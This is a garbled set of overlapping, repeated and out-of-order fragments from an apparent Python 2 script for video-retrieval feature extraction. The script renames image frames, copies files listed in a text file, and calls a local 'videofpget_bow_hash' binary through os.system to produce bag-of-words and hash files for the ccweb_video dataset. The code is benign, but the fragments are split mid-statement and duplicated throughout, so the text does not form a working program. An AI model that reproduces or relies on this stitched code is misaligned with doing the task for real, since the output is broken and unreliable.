img_path.split('/')[-1] + '.bow ' + os.path.dirname(img_path) + '/'", "1), len(dir_child_list)) end_time = time.time() print (\"final_feature extract time:\", (end_time - start_time)) print", "1 26069 /retrieval/VideoDNA/VideoRetrival/bins/centers128_32sift.bin /retrieval/VideoDNA/VideoRetrival/bins/ITQ_32_dim800.bin /opt/dongsl/t.bow /opt/dongsl/t.hash' def feature_generator_sift_color(dir_img): dir_child_list = get_dirs_child(dir_img) print \"--------------------------------------------------\"", "'/' + img_path.split('/')[-1] + '.bow ' + os.path.dirname(img_path) + '/' + img_path.split('/')[ -1]", "attation!\" return -1 shutil.copy(eachfile, targetDir + os.path.basename(eachfile)) print eachfile + \" copy succeeded!\"", "+ img_path.split('/')[-1] + '_img_names.txt', 'w') as name_file: name_file.writelines(names) print \"extracting feature from image", "list_imgs_tmp = f.readlines() for item_img in list_imgs_tmp: list_imgs.append( item_img.split(' ')[0].replace('/opt/Datasets/Datasets/ccweb_video/dataset_ccweb/trans_imgs', '/Data/Datasets/ccweb_video/dataset_ccweb/trans_imgs').strip()) if not", "= time.time() print (\"final_feature extract time:\", (end_time - start_time)) print \"--------------------------------------------------\" print \"", "item_img.split(' ')[0].replace('/opt/Datasets/Datasets/ccweb_video/dataset_ccweb/trans_imgs', '/Data/Datasets/ccweb_video/dataset_ccweb/trans_imgs').strip()) if not os.path.exists(targetDir): os.makedirs(targetDir) for eachfile in list_imgs: if not", "in list_imgs: if not os.path.exists(eachfile): print \"src path not exist:\" + eachfile print", "+ str(len( img_names)) + ' /retrieval/VideoDNA/VideoRetrival/bins/centers128_32sift.bin /retrieval/VideoDNA/VideoRetrival/bins/ITQ_32_dim800.bin ' + os.path.dirname( img_path) + '/'", "' + os.path.dirname( img_path) + '/' + img_path.split('/')[-1] + '.bow ' + os.path.dirname(img_path)", "list_imgs: if not os.path.exists(eachfile): print \"src path not exist:\" + eachfile print 
\"error!!", "eachfile print \"error!! attation!\" return -1 shutil.copy(eachfile, targetDir + os.path.basename(eachfile)) print eachfile +", "''' 根据图片文件列表,获取线上系统 查询视频帧 .bow .hash .txt 信息 :param target_dir: endswith / :return: '''", "[os.path.join(path, f) for f in os.listdir(path)] def get_all_files_suffix(path, file_suffix='.jpg'): all_file = [] for", "print \"src path not exist:\" + eachfile print \"error!! attation!\" return -1 shutil.copy(eachfile,", "list_imgs_tmp: list_imgs.append( item_img.split(' ')[0].replace('/opt/Datasets/Datasets/ccweb_video/dataset_ccweb/trans_imgs', '/Data/Datasets/ccweb_video/dataset_ccweb/trans_imgs').strip()) if not os.path.exists(targetDir): os.makedirs(targetDir) for eachfile in list_imgs:", "def get_all_files_suffix(path, file_suffix='.jpg'): all_file = [] for dirpath, dirnames, filenames in os.walk(path): for", "path not exist:\" + eachfile print \"error!! attation!\" return -1 shutil.copy(eachfile, targetDir +", "/opt/dongsl/a.hash' '/usr/local/bin/videofpget_bow_hash /opt/dongsl/trans_imgs/add_text 1 26069 /retrieval/VideoDNA/VideoRetrival/bins/centers128_32sift.bin /retrieval/VideoDNA/VideoRetrival/bins/ITQ_32_dim800.bin /opt/dongsl/t.bow /opt/dongsl/t.hash' def feature_generator_sift_color(dir_img): dir_child_list =", "+ os.path.basename(eachfile)) print eachfile + \" copy succeeded!\" cmd = '/usr/local/bin/videofpget_bow_hash /opt/dongsl/keyframe/10732a0e6a0edef9dcbb2155236e46a7ed5047c0/ 1", "j, item_name in enumerate(img_names): names.append(item_name) newname = os.path.dirname(item_name) + '/%05d' % (j +", "'/usr/local/bin/videofpget_bow_hash /opt/dongsl/trans_imgs/add_text 1 26069 /retrieval/VideoDNA/VideoRetrival/bins/centers128_32sift.bin /retrieval/VideoDNA/VideoRetrival/bins/ITQ_32_dim800.bin /opt/dongsl/t.bow /opt/dongsl/t.hash' def feature_generator_sift_color(dir_img): dir_child_list = get_dirs_child(dir_img)", "+ img_path + '/ 1 ' + str(len( img_names)) + ' 
/retrieval/VideoDNA/VideoRetrival/bins/centers128_32sift.bin /retrieval/VideoDNA/VideoRetrival/bins/ITQ_32_dim800.bin", "end_time = time.time() print (\"final_feature extract time:\", (end_time - start_time)) print \"--------------------------------------------------\" print", "not os.path.exists(eachfile): print \"src path not exist:\" + eachfile print \"error!! attation!\" return", "img_path in enumerate(dir_child_list): names = [] img_names = get_all_files_suffix(img_path) for j, item_name in", "start_time = time.time() for i, img_path in enumerate(dir_child_list): names = [] img_names =", "def copyFiles(file_imgs, targetDir): list_imgs = [] with open(file_imgs, 'r') as f: list_imgs_tmp =", "copyFiles(file_imgs, targetDir): list_imgs = [] with open(file_imgs, 'r') as f: list_imgs_tmp = f.readlines()", "enumerate(dir_child_list): names = [] img_names = get_all_files_suffix(img_path) for j, item_name in enumerate(img_names): names.append(item_name)", "= '/usr/local/bin/videofpget_bow_hash /opt/dongsl/keyframe/10732a0e6a0edef9dcbb2155236e46a7ed5047c0/ 1 4 /retrieval/VideoDNA/VideoRetrival/bins/centers128_32sift.bin /retrieval/VideoDNA/VideoRetrival/bins/ITQ_32_dim800.bin /opt/a.bow /opt/dongsl/a.hash' '/usr/local/bin/videofpget_bow_hash /opt/dongsl/trans_imgs/add_text 1 26069", "len(img_names) fp_pick = '/usr/local/bin/videofpget_bow_hash ' + img_path + '/ 1 ' + str(len(", "# coding=utf-8 import os import shutil import time def get_dirs_child(path): return [os.path.join(path, f)", "'/' + img_path.split('/')[ -1] + '.hash' os.system(fp_pick) with open(os.path.dirname(img_path) + '/' + img_path.split('/')[-1]", "' + os.path.dirname(img_path) + '/' + img_path.split('/')[ -1] + '.hash' os.system(fp_pick) with open(os.path.dirname(img_path)", "name)) return all_file def copyFiles(file_imgs, targetDir): list_imgs = [] with open(file_imgs, 'r') as", "get_all_files_suffix(img_path) print len(img_names) fp_pick = '/usr/local/bin/videofpget_bow_hash ' + img_path + '/ 1 '", 
"with open(os.path.dirname(img_path) + '/' + img_path.split('/')[-1] + '_img_names.txt', 'w') as name_file: name_file.writelines(names) print", "time.time() print (\"final_feature extract time:\", (end_time - start_time)) print \"--------------------------------------------------\" print \" feature", "ends ...\" print \"--------------------------------------------------\" def feature_generator_query(target_dir): ''' 根据图片文件列表,获取线上系统 查询视频帧 .bow .hash .txt 信息", "os.path.dirname(item_name) + '/%05d' % (j + 1) os.rename(item_name, newname + \".jpg\") img_names =", "str(len( img_names)) + ' /retrieval/VideoDNA/VideoRetrival/bins/centers128_32sift.bin /retrieval/VideoDNA/VideoRetrival/bins/ITQ_32_dim800.bin ' + os.path.dirname( img_path) + '/' +", "list_imgs.append( item_img.split(' ')[0].replace('/opt/Datasets/Datasets/ccweb_video/dataset_ccweb/trans_imgs', '/Data/Datasets/ccweb_video/dataset_ccweb/trans_imgs').strip()) if not os.path.exists(targetDir): os.makedirs(targetDir) for eachfile in list_imgs: if", "dir_child_list = get_dirs_child(dir_img) print \"--------------------------------------------------\" print \" feature extraction starts\" print \"--------------------------------------------------\" start_time", "feature from image No. 
%d , %d dirs in total\" % ((i +", "+ '/ 1 ' + str(len( img_names)) + ' /retrieval/VideoDNA/VideoRetrival/bins/centers128_32sift.bin /retrieval/VideoDNA/VideoRetrival/bins/ITQ_32_dim800.bin ' +", "in total\" % ((i + 1), len(dir_child_list)) end_time = time.time() print (\"final_feature extract", "print (\"final_feature extract time:\", (end_time - start_time)) print \"--------------------------------------------------\" print \" feature extraction", "%d dirs in total\" % ((i + 1), len(dir_child_list)) end_time = time.time() print", "f in os.listdir(path)] def get_all_files_suffix(path, file_suffix='.jpg'): all_file = [] for dirpath, dirnames, filenames", "/opt/dongsl/trans_imgs/add_text 1 26069 /retrieval/VideoDNA/VideoRetrival/bins/centers128_32sift.bin /retrieval/VideoDNA/VideoRetrival/bins/ITQ_32_dim800.bin /opt/dongsl/t.bow /opt/dongsl/t.hash' def feature_generator_sift_color(dir_img): dir_child_list = get_dirs_child(dir_img) print", "img_path) + '/' + img_path.split('/')[-1] + '.bow ' + os.path.dirname(img_path) + '/' +", "newname + \".jpg\") img_names = get_all_files_suffix(img_path) print len(img_names) fp_pick = '/usr/local/bin/videofpget_bow_hash ' +", "shutil import time def get_dirs_child(path): return [os.path.join(path, f) for f in os.listdir(path)] def", ".hash .txt 信息 :param target_dir: endswith / :return: ''' copyFiles('./test_2000.txt', target_dir) feature_generator_sift_color(dir_img=os.path.abspath(os.path.join(os.path.dirname(target_dir), '../')))", "shutil.copy(eachfile, targetDir + os.path.basename(eachfile)) print eachfile + \" copy succeeded!\" cmd = '/usr/local/bin/videofpget_bow_hash", "1 4 /retrieval/VideoDNA/VideoRetrival/bins/centers128_32sift.bin /retrieval/VideoDNA/VideoRetrival/bins/ITQ_32_dim800.bin /opt/a.bow /opt/dongsl/a.hash' '/usr/local/bin/videofpget_bow_hash /opt/dongsl/trans_imgs/add_text 1 26069 /retrieval/VideoDNA/VideoRetrival/bins/centers128_32sift.bin /retrieval/VideoDNA/VideoRetrival/bins/ITQ_32_dim800.bin 
/opt/dongsl/t.bow", "filenames: if name.endswith(file_suffix): all_file.append(os.path.join(dirpath, name)) return all_file def copyFiles(file_imgs, targetDir): list_imgs = []", "for eachfile in list_imgs: if not os.path.exists(eachfile): print \"src path not exist:\" +", "+ '/%05d' % (j + 1) os.rename(item_name, newname + \".jpg\") img_names = get_all_files_suffix(img_path)", "len(dir_child_list)) end_time = time.time() print (\"final_feature extract time:\", (end_time - start_time)) print \"--------------------------------------------------\"", ", %d dirs in total\" % ((i + 1), len(dir_child_list)) end_time = time.time()", "fp_pick = '/usr/local/bin/videofpget_bow_hash ' + img_path + '/ 1 ' + str(len( img_names))", "根据图片文件列表,获取线上系统 查询视频帧 .bow .hash .txt 信息 :param target_dir: endswith / :return: ''' copyFiles('./test_2000.txt',", "all_file = [] for dirpath, dirnames, filenames in os.walk(path): for name in filenames:", ":return: ''' copyFiles('./test_2000.txt', target_dir) feature_generator_sift_color(dir_img=os.path.abspath(os.path.join(os.path.dirname(target_dir), '../'))) if __name__ == \"__main__\": query_dir_imgs = '/opt/dongsl/tmp2/tmp/'", "return all_file def copyFiles(file_imgs, targetDir): list_imgs = [] with open(file_imgs, 'r') as f:", "succeeded!\" cmd = '/usr/local/bin/videofpget_bow_hash /opt/dongsl/keyframe/10732a0e6a0edef9dcbb2155236e46a7ed5047c0/ 1 4 /retrieval/VideoDNA/VideoRetrival/bins/centers128_32sift.bin /retrieval/VideoDNA/VideoRetrival/bins/ITQ_32_dim800.bin /opt/a.bow /opt/dongsl/a.hash' '/usr/local/bin/videofpget_bow_hash /opt/dongsl/trans_imgs/add_text", "'.bow ' + os.path.dirname(img_path) + '/' + img_path.split('/')[ -1] + '.hash' os.system(fp_pick) with", "os.makedirs(targetDir) for eachfile in list_imgs: if not os.path.exists(eachfile): print \"src path not exist:\"", "/retrieval/VideoDNA/VideoRetrival/bins/ITQ_32_dim800.bin /opt/dongsl/t.bow /opt/dongsl/t.hash' def feature_generator_sift_color(dir_img): dir_child_list = 
get_dirs_child(dir_img) print \"--------------------------------------------------\" print \" feature", "+ '/' + img_path.split('/')[ -1] + '.hash' os.system(fp_pick) with open(os.path.dirname(img_path) + '/' +", "查询视频帧 .bow .hash .txt 信息 :param target_dir: endswith / :return: ''' copyFiles('./test_2000.txt', target_dir)", "as f: list_imgs_tmp = f.readlines() for item_img in list_imgs_tmp: list_imgs.append( item_img.split(' ')[0].replace('/opt/Datasets/Datasets/ccweb_video/dataset_ccweb/trans_imgs', '/Data/Datasets/ccweb_video/dataset_ccweb/trans_imgs').strip())", "'/usr/local/bin/videofpget_bow_hash /opt/dongsl/keyframe/10732a0e6a0edef9dcbb2155236e46a7ed5047c0/ 1 4 /retrieval/VideoDNA/VideoRetrival/bins/centers128_32sift.bin /retrieval/VideoDNA/VideoRetrival/bins/ITQ_32_dim800.bin /opt/a.bow /opt/dongsl/a.hash' '/usr/local/bin/videofpget_bow_hash /opt/dongsl/trans_imgs/add_text 1 26069 /retrieval/VideoDNA/VideoRetrival/bins/centers128_32sift.bin", "return [os.path.join(path, f) for f in os.listdir(path)] def get_all_files_suffix(path, file_suffix='.jpg'): all_file = []", "+ '/' + img_path.split('/')[-1] + '_img_names.txt', 'w') as name_file: name_file.writelines(names) print \"extracting feature", "= time.time() for i, img_path in enumerate(dir_child_list): names = [] img_names = get_all_files_suffix(img_path)", "img_path.split('/')[ -1] + '.hash' os.system(fp_pick) with open(os.path.dirname(img_path) + '/' + img_path.split('/')[-1] + '_img_names.txt',", "+ '.hash' os.system(fp_pick) with open(os.path.dirname(img_path) + '/' + img_path.split('/')[-1] + '_img_names.txt', 'w') as", "os.path.basename(eachfile)) print eachfile + \" copy succeeded!\" cmd = '/usr/local/bin/videofpget_bow_hash /opt/dongsl/keyframe/10732a0e6a0edef9dcbb2155236e46a7ed5047c0/ 1 4", "'/Data/Datasets/ccweb_video/dataset_ccweb/trans_imgs').strip()) if not os.path.exists(targetDir): os.makedirs(targetDir) for eachfile in list_imgs: if not os.path.exists(eachfile): print", "os.system(fp_pick) 
with open(os.path.dirname(img_path) + '/' + img_path.split('/')[-1] + '_img_names.txt', 'w') as name_file: name_file.writelines(names)", "26069 /retrieval/VideoDNA/VideoRetrival/bins/centers128_32sift.bin /retrieval/VideoDNA/VideoRetrival/bins/ITQ_32_dim800.bin /opt/dongsl/t.bow /opt/dongsl/t.hash' def feature_generator_sift_color(dir_img): dir_child_list = get_dirs_child(dir_img) print \"--------------------------------------------------\" print", "img_names = get_all_files_suffix(img_path) for j, item_name in enumerate(img_names): names.append(item_name) newname = os.path.dirname(item_name) +", "get_dirs_child(dir_img) print \"--------------------------------------------------\" print \" feature extraction starts\" print \"--------------------------------------------------\" start_time = time.time()", "open(os.path.dirname(img_path) + '/' + img_path.split('/')[-1] + '_img_names.txt', 'w') as name_file: name_file.writelines(names) print \"extracting", "print \" feature extraction ends ...\" print \"--------------------------------------------------\" def feature_generator_query(target_dir): ''' 根据图片文件列表,获取线上系统 查询视频帧", "\"--------------------------------------------------\" print \" feature extraction ends ...\" print \"--------------------------------------------------\" def feature_generator_query(target_dir): ''' 根据图片文件列表,获取线上系统", "for dirpath, dirnames, filenames in os.walk(path): for name in filenames: if name.endswith(file_suffix): all_file.append(os.path.join(dirpath,", "print \"--------------------------------------------------\" start_time = time.time() for i, img_path in enumerate(dir_child_list): names = []", "+ eachfile print \"error!! attation!\" return -1 shutil.copy(eachfile, targetDir + os.path.basename(eachfile)) print eachfile", "coding=utf-8 import os import shutil import time def get_dirs_child(path): return [os.path.join(path, f) for", "from image No. %d , %d dirs in total\" % ((i + 1),", "print \"extracting feature from image No. 
%d , %d dirs in total\" %", "+ \" copy succeeded!\" cmd = '/usr/local/bin/videofpget_bow_hash /opt/dongsl/keyframe/10732a0e6a0edef9dcbb2155236e46a7ed5047c0/ 1 4 /retrieval/VideoDNA/VideoRetrival/bins/centers128_32sift.bin /retrieval/VideoDNA/VideoRetrival/bins/ITQ_32_dim800.bin /opt/a.bow", "all_file.append(os.path.join(dirpath, name)) return all_file def copyFiles(file_imgs, targetDir): list_imgs = [] with open(file_imgs, 'r')", "if not os.path.exists(targetDir): os.makedirs(targetDir) for eachfile in list_imgs: if not os.path.exists(eachfile): print \"src", "name_file: name_file.writelines(names) print \"extracting feature from image No. %d , %d dirs in", ".txt 信息 :param target_dir: endswith / :return: ''' copyFiles('./test_2000.txt', target_dir) feature_generator_sift_color(dir_img=os.path.abspath(os.path.join(os.path.dirname(target_dir), '../'))) if", "'/usr/local/bin/videofpget_bow_hash ' + img_path + '/ 1 ' + str(len( img_names)) + '", "/opt/a.bow /opt/dongsl/a.hash' '/usr/local/bin/videofpget_bow_hash /opt/dongsl/trans_imgs/add_text 1 26069 /retrieval/VideoDNA/VideoRetrival/bins/centers128_32sift.bin /retrieval/VideoDNA/VideoRetrival/bins/ITQ_32_dim800.bin /opt/dongsl/t.bow /opt/dongsl/t.hash' def feature_generator_sift_color(dir_img): dir_child_list", "time def get_dirs_child(path): return [os.path.join(path, f) for f in os.listdir(path)] def get_all_files_suffix(path, file_suffix='.jpg'):", "name.endswith(file_suffix): all_file.append(os.path.join(dirpath, name)) return all_file def copyFiles(file_imgs, targetDir): list_imgs = [] with open(file_imgs,", "%d , %d dirs in total\" % ((i + 1), len(dir_child_list)) end_time =", "(j + 1) os.rename(item_name, newname + \".jpg\") img_names = get_all_files_suffix(img_path) print len(img_names) fp_pick", "print \"--------------------------------------------------\" print \" feature extraction ends ...\" print \"--------------------------------------------------\" def feature_generator_query(target_dir): '''", "import 
time def get_dirs_child(path): return [os.path.join(path, f) for f in os.listdir(path)] def get_all_files_suffix(path,", "for f in os.listdir(path)] def get_all_files_suffix(path, file_suffix='.jpg'): all_file = [] for dirpath, dirnames,", "cmd = '/usr/local/bin/videofpget_bow_hash /opt/dongsl/keyframe/10732a0e6a0edef9dcbb2155236e46a7ed5047c0/ 1 4 /retrieval/VideoDNA/VideoRetrival/bins/centers128_32sift.bin /retrieval/VideoDNA/VideoRetrival/bins/ITQ_32_dim800.bin /opt/a.bow /opt/dongsl/a.hash' '/usr/local/bin/videofpget_bow_hash /opt/dongsl/trans_imgs/add_text 1", "print \"--------------------------------------------------\" print \" feature extraction starts\" print \"--------------------------------------------------\" start_time = time.time() for", "dirs in total\" % ((i + 1), len(dir_child_list)) end_time = time.time() print (\"final_feature", "endswith / :return: ''' copyFiles('./test_2000.txt', target_dir) feature_generator_sift_color(dir_img=os.path.abspath(os.path.join(os.path.dirname(target_dir), '../'))) if __name__ == \"__main__\": query_dir_imgs", "os.listdir(path)] def get_all_files_suffix(path, file_suffix='.jpg'): all_file = [] for dirpath, dirnames, filenames in os.walk(path):", "def get_dirs_child(path): return [os.path.join(path, f) for f in os.listdir(path)] def get_all_files_suffix(path, file_suffix='.jpg'): all_file", "''' copyFiles('./test_2000.txt', target_dir) feature_generator_sift_color(dir_img=os.path.abspath(os.path.join(os.path.dirname(target_dir), '../'))) if __name__ == \"__main__\": query_dir_imgs = '/opt/dongsl/tmp2/tmp/' feature_generator_query(query_dir_imgs)", "print \"error!! 
attation!\" return -1 shutil.copy(eachfile, targetDir + os.path.basename(eachfile)) print eachfile + \"", "filenames in os.walk(path): for name in filenames: if name.endswith(file_suffix): all_file.append(os.path.join(dirpath, name)) return all_file", "i, img_path in enumerate(dir_child_list): names = [] img_names = get_all_files_suffix(img_path) for j, item_name", "item_name in enumerate(img_names): names.append(item_name) newname = os.path.dirname(item_name) + '/%05d' % (j + 1)", "not os.path.exists(targetDir): os.makedirs(targetDir) for eachfile in list_imgs: if not os.path.exists(eachfile): print \"src path", "(end_time - start_time)) print \"--------------------------------------------------\" print \" feature extraction ends ...\" print \"--------------------------------------------------\"", ".bow .hash .txt 信息 :param target_dir: endswith / :return: ''' copyFiles('./test_2000.txt', target_dir) feature_generator_sift_color(dir_img=os.path.abspath(os.path.join(os.path.dirname(target_dir),", "os.path.dirname(img_path) + '/' + img_path.split('/')[ -1] + '.hash' os.system(fp_pick) with open(os.path.dirname(img_path) + '/'", "= get_all_files_suffix(img_path) for j, item_name in enumerate(img_names): names.append(item_name) newname = os.path.dirname(item_name) + '/%05d'", "[] img_names = get_all_files_suffix(img_path) for j, item_name in enumerate(img_names): names.append(item_name) newname = os.path.dirname(item_name)", "((i + 1), len(dir_child_list)) end_time = time.time() print (\"final_feature extract time:\", (end_time -", "/opt/dongsl/t.hash' def feature_generator_sift_color(dir_img): dir_child_list = get_dirs_child(dir_img) print \"--------------------------------------------------\" print \" feature extraction starts\"", "1 ' + str(len( img_names)) + ' /retrieval/VideoDNA/VideoRetrival/bins/centers128_32sift.bin /retrieval/VideoDNA/VideoRetrival/bins/ITQ_32_dim800.bin ' + os.path.dirname( img_path)", "extraction starts\" print 
\"--------------------------------------------------\" start_time = time.time() for i, img_path in enumerate(dir_child_list): names", "feature extraction ends ...\" print \"--------------------------------------------------\" def feature_generator_query(target_dir): ''' 根据图片文件列表,获取线上系统 查询视频帧 .bow .hash", "total\" % ((i + 1), len(dir_child_list)) end_time = time.time() print (\"final_feature extract time:\",", "信息 :param target_dir: endswith / :return: ''' copyFiles('./test_2000.txt', target_dir) feature_generator_sift_color(dir_img=os.path.abspath(os.path.join(os.path.dirname(target_dir), '../'))) if __name__", "starts\" print \"--------------------------------------------------\" start_time = time.time() for i, img_path in enumerate(dir_child_list): names =", "os.walk(path): for name in filenames: if name.endswith(file_suffix): all_file.append(os.path.join(dirpath, name)) return all_file def copyFiles(file_imgs,", "eachfile + \" copy succeeded!\" cmd = '/usr/local/bin/videofpget_bow_hash /opt/dongsl/keyframe/10732a0e6a0edef9dcbb2155236e46a7ed5047c0/ 1 4 /retrieval/VideoDNA/VideoRetrival/bins/centers128_32sift.bin /retrieval/VideoDNA/VideoRetrival/bins/ITQ_32_dim800.bin", "\"error!! attation!\" return -1 shutil.copy(eachfile, targetDir + os.path.basename(eachfile)) print eachfile + \" copy", "= [] for dirpath, dirnames, filenames in os.walk(path): for name in filenames: if", "\"extracting feature from image No. 
%d , %d dirs in total\" % ((i", "' /retrieval/VideoDNA/VideoRetrival/bins/centers128_32sift.bin /retrieval/VideoDNA/VideoRetrival/bins/ITQ_32_dim800.bin ' + os.path.dirname( img_path) + '/' + img_path.split('/')[-1] + '.bow", "...\" print \"--------------------------------------------------\" def feature_generator_query(target_dir): ''' 根据图片文件列表,获取线上系统 查询视频帧 .bow .hash .txt 信息 :param", "targetDir + os.path.basename(eachfile)) print eachfile + \" copy succeeded!\" cmd = '/usr/local/bin/videofpget_bow_hash /opt/dongsl/keyframe/10732a0e6a0edef9dcbb2155236e46a7ed5047c0/", "time.time() for i, img_path in enumerate(dir_child_list): names = [] img_names = get_all_files_suffix(img_path) for", "'w') as name_file: name_file.writelines(names) print \"extracting feature from image No. %d , %d", "file_suffix='.jpg'): all_file = [] for dirpath, dirnames, filenames in os.walk(path): for name in", "= f.readlines() for item_img in list_imgs_tmp: list_imgs.append( item_img.split(' ')[0].replace('/opt/Datasets/Datasets/ccweb_video/dataset_ccweb/trans_imgs', '/Data/Datasets/ccweb_video/dataset_ccweb/trans_imgs').strip()) if not os.path.exists(targetDir):", "for i, img_path in enumerate(dir_child_list): names = [] img_names = get_all_files_suffix(img_path) for j,", "/opt/dongsl/keyframe/10732a0e6a0edef9dcbb2155236e46a7ed5047c0/ 1 4 /retrieval/VideoDNA/VideoRetrival/bins/centers128_32sift.bin /retrieval/VideoDNA/VideoRetrival/bins/ITQ_32_dim800.bin /opt/a.bow /opt/dongsl/a.hash' '/usr/local/bin/videofpget_bow_hash /opt/dongsl/trans_imgs/add_text 1 26069 /retrieval/VideoDNA/VideoRetrival/bins/centers128_32sift.bin /retrieval/VideoDNA/VideoRetrival/bins/ITQ_32_dim800.bin", "os.rename(item_name, newname + \".jpg\") img_names = get_all_files_suffix(img_path) print len(img_names) fp_pick = '/usr/local/bin/videofpget_bow_hash '", "img_path.split('/')[-1] + '.bow ' + os.path.dirname(img_path) + '/' + img_path.split('/')[ -1] + '.hash'", "No. 
%d , %d dirs in total\" % ((i + 1), len(dir_child_list)) end_time", "f) for f in os.listdir(path)] def get_all_files_suffix(path, file_suffix='.jpg'): all_file = [] for dirpath,", "+ '_img_names.txt', 'w') as name_file: name_file.writelines(names) print \"extracting feature from image No. %d", "% ((i + 1), len(dir_child_list)) end_time = time.time() print (\"final_feature extract time:\", (end_time", "\" feature extraction ends ...\" print \"--------------------------------------------------\" def feature_generator_query(target_dir): ''' 根据图片文件列表,获取线上系统 查询视频帧 .bow", "+ 1), len(dir_child_list)) end_time = time.time() print (\"final_feature extract time:\", (end_time - start_time))", "\"src path not exist:\" + eachfile print \"error!! attation!\" return -1 shutil.copy(eachfile, targetDir", "img_names = get_all_files_suffix(img_path) print len(img_names) fp_pick = '/usr/local/bin/videofpget_bow_hash ' + img_path + '/", "4 /retrieval/VideoDNA/VideoRetrival/bins/centers128_32sift.bin /retrieval/VideoDNA/VideoRetrival/bins/ITQ_32_dim800.bin /opt/a.bow /opt/dongsl/a.hash' '/usr/local/bin/videofpget_bow_hash /opt/dongsl/trans_imgs/add_text 1 26069 /retrieval/VideoDNA/VideoRetrival/bins/centers128_32sift.bin /retrieval/VideoDNA/VideoRetrival/bins/ITQ_32_dim800.bin /opt/dongsl/t.bow /opt/dongsl/t.hash'", "+ '.bow ' + os.path.dirname(img_path) + '/' + img_path.split('/')[ -1] + '.hash' os.system(fp_pick)", "if not os.path.exists(eachfile): print \"src path not exist:\" + eachfile print \"error!! 
attation!\"", "eachfile in list_imgs: if not os.path.exists(eachfile): print \"src path not exist:\" + eachfile", "\".jpg\") img_names = get_all_files_suffix(img_path) print len(img_names) fp_pick = '/usr/local/bin/videofpget_bow_hash ' + img_path +", "f.readlines() for item_img in list_imgs_tmp: list_imgs.append( item_img.split(' ')[0].replace('/opt/Datasets/Datasets/ccweb_video/dataset_ccweb/trans_imgs', '/Data/Datasets/ccweb_video/dataset_ccweb/trans_imgs').strip()) if not os.path.exists(targetDir): os.makedirs(targetDir)", "for item_img in list_imgs_tmp: list_imgs.append( item_img.split(' ')[0].replace('/opt/Datasets/Datasets/ccweb_video/dataset_ccweb/trans_imgs', '/Data/Datasets/ccweb_video/dataset_ccweb/trans_imgs').strip()) if not os.path.exists(targetDir): os.makedirs(targetDir) for", "return -1 shutil.copy(eachfile, targetDir + os.path.basename(eachfile)) print eachfile + \" copy succeeded!\" cmd", "+ 1) os.rename(item_name, newname + \".jpg\") img_names = get_all_files_suffix(img_path) print len(img_names) fp_pick =", "\" feature extraction starts\" print \"--------------------------------------------------\" start_time = time.time() for i, img_path in", "os import shutil import time def get_dirs_child(path): return [os.path.join(path, f) for f in", "% (j + 1) os.rename(item_name, newname + \".jpg\") img_names = get_all_files_suffix(img_path) print len(img_names)", "/retrieval/VideoDNA/VideoRetrival/bins/ITQ_32_dim800.bin /opt/a.bow /opt/dongsl/a.hash' '/usr/local/bin/videofpget_bow_hash /opt/dongsl/trans_imgs/add_text 1 26069 /retrieval/VideoDNA/VideoRetrival/bins/centers128_32sift.bin /retrieval/VideoDNA/VideoRetrival/bins/ITQ_32_dim800.bin /opt/dongsl/t.bow /opt/dongsl/t.hash' def feature_generator_sift_color(dir_img):", "img_path.split('/')[-1] + '_img_names.txt', 'w') as name_file: name_file.writelines(names) print \"extracting feature from image No.", "1) os.rename(item_name, newname + \".jpg\") img_names = get_all_files_suffix(img_path) print 
len(img_names) fp_pick = '/usr/local/bin/videofpget_bow_hash", "= get_all_files_suffix(img_path) print len(img_names) fp_pick = '/usr/local/bin/videofpget_bow_hash ' + img_path + '/ 1", "'/ 1 ' + str(len( img_names)) + ' /retrieval/VideoDNA/VideoRetrival/bins/centers128_32sift.bin /retrieval/VideoDNA/VideoRetrival/bins/ITQ_32_dim800.bin ' + os.path.dirname(", "+ img_path.split('/')[ -1] + '.hash' os.system(fp_pick) with open(os.path.dirname(img_path) + '/' + img_path.split('/')[-1] +", "+ os.path.dirname(img_path) + '/' + img_path.split('/')[ -1] + '.hash' os.system(fp_pick) with open(os.path.dirname(img_path) +", "+ img_path.split('/')[-1] + '.bow ' + os.path.dirname(img_path) + '/' + img_path.split('/')[ -1] +", "')[0].replace('/opt/Datasets/Datasets/ccweb_video/dataset_ccweb/trans_imgs', '/Data/Datasets/ccweb_video/dataset_ccweb/trans_imgs').strip()) if not os.path.exists(targetDir): os.makedirs(targetDir) for eachfile in list_imgs: if not os.path.exists(eachfile):", "not exist:\" + eachfile print \"error!! 
attation!\" return -1 shutil.copy(eachfile, targetDir + os.path.basename(eachfile))", "in enumerate(dir_child_list): names = [] img_names = get_all_files_suffix(img_path) for j, item_name in enumerate(img_names):", "' + str(len( img_names)) + ' /retrieval/VideoDNA/VideoRetrival/bins/centers128_32sift.bin /retrieval/VideoDNA/VideoRetrival/bins/ITQ_32_dim800.bin ' + os.path.dirname( img_path) +", "img_names)) + ' /retrieval/VideoDNA/VideoRetrival/bins/centers128_32sift.bin /retrieval/VideoDNA/VideoRetrival/bins/ITQ_32_dim800.bin ' + os.path.dirname( img_path) + '/' + img_path.split('/')[-1]", "(\"final_feature extract time:\", (end_time - start_time)) print \"--------------------------------------------------\" print \" feature extraction ends", "target_dir: endswith / :return: ''' copyFiles('./test_2000.txt', target_dir) feature_generator_sift_color(dir_img=os.path.abspath(os.path.join(os.path.dirname(target_dir), '../'))) if __name__ == \"__main__\":", "in filenames: if name.endswith(file_suffix): all_file.append(os.path.join(dirpath, name)) return all_file def copyFiles(file_imgs, targetDir): list_imgs =", "all_file def copyFiles(file_imgs, targetDir): list_imgs = [] with open(file_imgs, 'r') as f: list_imgs_tmp", "get_all_files_suffix(img_path) for j, item_name in enumerate(img_names): names.append(item_name) newname = os.path.dirname(item_name) + '/%05d' %", "names.append(item_name) newname = os.path.dirname(item_name) + '/%05d' % (j + 1) os.rename(item_name, newname +", "/retrieval/VideoDNA/VideoRetrival/bins/ITQ_32_dim800.bin ' + os.path.dirname( img_path) + '/' + img_path.split('/')[-1] + '.bow ' +", "'.hash' os.system(fp_pick) with open(os.path.dirname(img_path) + '/' + img_path.split('/')[-1] + '_img_names.txt', 'w') as name_file:", "in os.listdir(path)] def get_all_files_suffix(path, file_suffix='.jpg'): all_file = [] for dirpath, dirnames, filenames in", "\"--------------------------------------------------\" start_time = time.time() for i, img_path in 
